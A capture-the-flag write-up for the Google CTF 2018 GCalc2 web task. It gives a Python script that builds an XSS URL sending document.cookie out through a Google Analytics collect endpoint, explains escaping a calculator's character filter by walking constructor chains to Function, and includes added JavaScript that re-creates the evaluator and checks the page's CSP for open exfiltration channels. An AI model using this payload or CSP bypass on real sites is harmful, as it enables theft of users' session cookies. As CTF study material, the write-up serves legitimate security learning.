Last active Jun 27, 2018
Google CTF 2018 Quals: GCalc2 web task solution
from urllib.parse import quote_plus

ga_tid = 'UA-***-1'  # put your GA tracking id here
# GA Measurement Protocol collect endpoint (restored from the protocol docs; the
# gist's copy of this URL is missing): v=1, tid=<property id>, cid=<client id>
collect = 'https://www.google-analytics.com/collect?v=1&tid=%s&cid=' % ga_tid
# event hit with document.cookie smuggled out in the campaign-name (cn) parameter
payload = (
    "script = document.createElement('script');"
    "script.src='" + collect + "'+Math.random()+'&t=event&ec=email&el='+Math.random()"
    "+'&cs=newsletter&cm=email&cn='+document.cookie+'&cm1=1&ea=test';"
    "document.head.appendChild(script);"
).replace('"', '\\"')  # the payload is embedded in a JSON string, so escape double quotes
url = ''  # base URL of the sandbox page goes here
url += '?,%22' + quote_plus(payload) + '%22:1%7D'  # ?<empty expression>,"<payload>":1}
print(url)
The application implements a client-side calculator. You can also submit calculation requests to the flag bot, whose cookie contains the flag.
A request consists of 1) an expression and 2) a JSON object of input variables (vars).
The essential parts of the solution are as follows:
1) The expressions are executed by the following function:
function p(a, b) {
  a = String(a).toLowerCase();
  b = String(b);
  // the whole expression must consist of digits, operators, parentheses, spaces,
  // the word "vars" and ".identifier" property accesses; anything else is rejected
  if (!/^(?:[\(\)\*\/\+%\-0-9 ]|\bvars\b|[.]\w+)*$/.test(a)) throw Error(a);
  b = JSON.parse(b, function(a, b) {
    // plain objects are rebuilt without a prototype, so vars itself has no .constructor
    if (b && "object" === typeof b && !Array.isArray(b)) return Object.assign(Object.create(null), b);
    if ("number" === typeof b) return b
    // other value types fall through (undefined) and are dropped; closing braces restored
  });
  return (new Function("vars", "return " + a))(b)
}
So a JS payload has to be built from a very limited alphabet: digits, the operators ( ) * / + % -, spaces, the identifier vars, and property accesses of the form .name (the [.]\w+ alternative). The last two are enough to walk constructor chains, and a property access may be followed by () to call whatever it reached.
The payload from my exploit can be broken down the following way (browser console, one intermediate value per line):
> vars={"pi":3,"return 31337":0}
{pi: 3, return 31337: 0}
ƒ Function() { [native code] }                        <- the Function constructor
["", index: 0, input: "Number", groups: undefined]    <- a regex match result on the string "Number"
ƒ Object() { [native code] }                          <- the Object constructor
(2) ["pi", "return 31337"]                            <- the keys of vars, the only strings we control
"return 31337"                                        <- the second key: a string the expression filter would never let us type directly
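To reproduce the bypass under node, here is the evaluator re-typed with one filter-compliant expression per step of the chain. This is an added example, not the challenge's or the author's code: the truncated reviver is closed on the assumption that non-number, non-object values are dropped, the route to Object goes through __proto__ rather than through the regex match the console session above uses, and the vars JSON is constructed for the example.

```javascript
// Added example (not the challenge's code): the GCalc2 evaluator `p` re-typed from
// the writeup so the alphabet bypass can be reproduced under node. The writeup's copy
// of the JSON.parse reviver is cut off after the number check; it is closed here on
// the assumption that every other value type (strings, booleans, null) is dropped.
function p(a, b) {
  a = String(a).toLowerCase();
  b = String(b);
  if (!/^(?:[\(\)\*\/\+%\-0-9 ]|\bvars\b|[.]\w+)*$/.test(a)) throw Error(a);
  b = JSON.parse(b, function (key, value) {
    // plain objects lose their prototype, so `vars.constructor` is undefined...
    if (value && "object" === typeof value && !Array.isArray(value)) {
      return Object.assign(Object.create(null), value);
    }
    if ("number" === typeof value) return value;
    // (assumed) anything else is deleted by returning undefined
  });
  return (new Function("vars", "return " + a))(b);
}

// Constructed input: a number value is the foothold into the built-ins (its
// constructor chain is intact), and the second key is the code we want to run.
const VARS = '{"pi":3,"return 31337":0}';

// Every expression below passes the filter: only `vars`, `.name`, parentheses.
const STEPS = {
  numberCtor: "vars.pi.constructor",                                    // Number
  functionCtor: "vars.pi.constructor.constructor",                      // Function
  objectCtor: "vars.pi.constructor.__proto__.__proto__.constructor",    // Object
  keys: "vars.pi.constructor.__proto__.__proto__.constructor.keys(vars)",
  code: "vars.pi.constructor.__proto__.__proto__.constructor.keys(vars).pop()", // "return 31337"
};

// Function(<second key>)(): the key list is the only way to smuggle a string past the regex.
const EXPLOIT = "vars.pi.constructor.constructor(" + STEPS.code + ")()";

// Normal use of the calculator, for comparison.
function calculate(expr) {
  return p(expr, VARS);
}

// Runs the smuggled code through the filter and returns what it evaluates to.
function runExploit() {
  return p(EXPLOIT, VARS);
}
```

Each expression in STEPS can be fed to `p` on its own to see the intermediate value, mirroring the console session; the payload in the script at the top of the page is just a longer second key.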
2) We should also bypass CSP. The calculator page loads in a sandboxed iframe (sandbox="allow-scripts allow-modals allow-same-origin").
The sandbox sends the following header:
Content-Security-Policy: default-src 'self'; frame-ancestors; font-src; style-src 'self' https://* 'unsafe-inline'; script-src 'self' https://* 'unsafe-eval'; child-src; img-src;
Meaning, our injected JS does run (script-src carries 'unsafe-eval', which is exactly the new Function path above; 'unsafe-inline' is granted only for styles, not scripts), but there is no straightforward way to exfiltrate: connect-src is absent and falls back to default-src 'self', so fetch and XHR to another origin are blocked, and img-src is present but empty, which is equivalent to 'none', so image beacons are blocked too. Appending a meta tag with a new CSP does not help either: an additional policy can only tighten the one already in force, never relax it.
But script-src 'self' https://* permits loading a script from any https origin, so we can use Google Analytics to "collect user data": a <script> whose src is the Measurement Protocol collect endpoint, with document.cookie (which contains the flag) stuffed into an event parameter, is requested before the browser finds out that the response (a 1x1 GIF) is not JavaScript, and the hit, cookie included, lands in the attacker's GA property. That is what the script at the top of the page builds.
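To make the "no channel but an external <script>" reasoning checkable, here is a small CSP source-list matcher run against the header above. It is an added example, not part of the writeup or the challenge; it models only the CSP behaviour this header exercises (default-src fallback for fetch directives, an empty source list meaning 'none', 'self', scheme sources such as https://*, and the unsafe-* keywords), and the sandbox origin and the GA URL in it are assumed values.

```javascript
// Added example (not from the original writeup): a minimal CSP source-list matcher
// to check offline which exfiltration channels the sandbox header leaves open.
// Header copied from the writeup; the page origin and the GA URL are assumptions.
const SANDBOX_CSP =
  "default-src 'self'; frame-ancestors; font-src; " +
  "style-src 'self' https://* 'unsafe-inline'; " +
  "script-src 'self' https://* 'unsafe-eval'; child-src; img-src;";
const PAGE_ORIGIN = "https://sandbox.example"; // assumed origin of the calculator page
const GA_COLLECT = "https://www.google-analytics.com/collect?v=1&tid=UA-0-1&cid=1&cn=flag";

// "name src src; name src" -> Map(name -> [sources]); a repeated directive is ignored.
function parseCsp(header) {
  const policy = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    if (!policy.has(name)) policy.set(name, sources);
  }
  return policy;
}

// Fetch directives (script-src, img-src, connect-src, ...) fall back to default-src
// when absent; null means nothing restricts the load.
function effectiveSources(policy, directive) {
  if (policy.has(directive)) return policy.get(directive);
  return policy.has("default-src") ? policy.get("default-src") : null;
}

// Does one source expression match a URL? Keywords other than 'self' never match URLs.
function sourceMatches(source, url) {
  const target = new URL(url);
  if (source === "'self'") return target.origin === PAGE_ORIGIN;
  if (source === "*") return true; // real CSP excludes data:/blob: here; not modelled
  if (source.startsWith("'")) return false;
  // scheme-source ("https:") or wildcard-host source ("https://*"): any host on that scheme
  const scheme = source.match(/^([a-z][a-z0-9+.-]*):(?:\/\/\*)?$/i);
  if (scheme) return target.protocol === scheme[1].toLowerCase() + ":";
  // host-source: compare origin only (no host wildcards or path matching modelled)
  try {
    return new URL(source).origin === target.origin;
  } catch (e) {
    return false;
  }
}

// Would a load of `url` governed by `directive` be permitted by `header`?
function allows(header, directive, url) {
  const sources = effectiveSources(parseCsp(header), directive);
  if (sources === null) return true;
  if (sources.length === 0 || sources.includes("'none'")) return false; // empty list == 'none'
  return sources.some((s) => sourceMatches(s, url));
}

function allowsKeyword(header, directive, keyword) {
  const sources = effectiveSources(parseCsp(header), directive) || [];
  return sources.includes(keyword);
}

// The channels the writeup weighs up, in the order it dismisses them.
function exfilChannels(header) {
  return {
    fetchOrXhr: allows(header, "connect-src", GA_COLLECT),     // no connect-src -> default-src 'self'
    imageBeacon: allows(header, "img-src", GA_COLLECT),        // img-src is empty, i.e. 'none'
    inlineScript: allowsKeyword(header, "script-src", "'unsafe-inline'"),
    evalOrFunction: allowsKeyword(header, "script-src", "'unsafe-eval'"), // how the payload runs at all
    externalScript: allows(header, "script-src", GA_COLLECT),  // https://* lets the GA <script> load
  };
}
```

Swap in your own header and origin to see which directive a given exfiltration attempt actually hits; the common mistake this catches is reading an empty `img-src;` as "unset" when it is in fact a complete block.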